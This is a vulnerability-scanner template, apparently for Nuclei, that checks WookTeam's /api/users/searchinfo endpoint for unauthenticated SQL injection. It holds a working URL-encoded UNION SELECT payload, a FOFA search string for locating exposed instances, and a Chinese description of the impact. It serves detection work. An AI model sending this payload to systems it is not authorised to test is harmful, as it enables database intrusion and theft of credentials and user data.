http:
    - matchers:
        - part: body
          type: word
          words:
            - e10adc3949ba59abbe56e057f20f883e
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2CMD5%28123456%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
id: WookTeam-searchinfo-sql
info:
    author: Superhero
    description: |-
        fofa: title="Wookteam"
        WookTeam /api/users/searchinfo 接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。
    name: WookTeam searchinfo SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486406&idx=1&sn=c36ed1d4291668636f78de9ac24f9557&chksm=c267bef5f51037e3858cce2217b97dd1adbf6d2b52f6e65636bf4c37f9134d8b402a7d3c8954&token=1628549949&lang=zh_CN#rd
    severity: high
    tags:
        - WookTeam
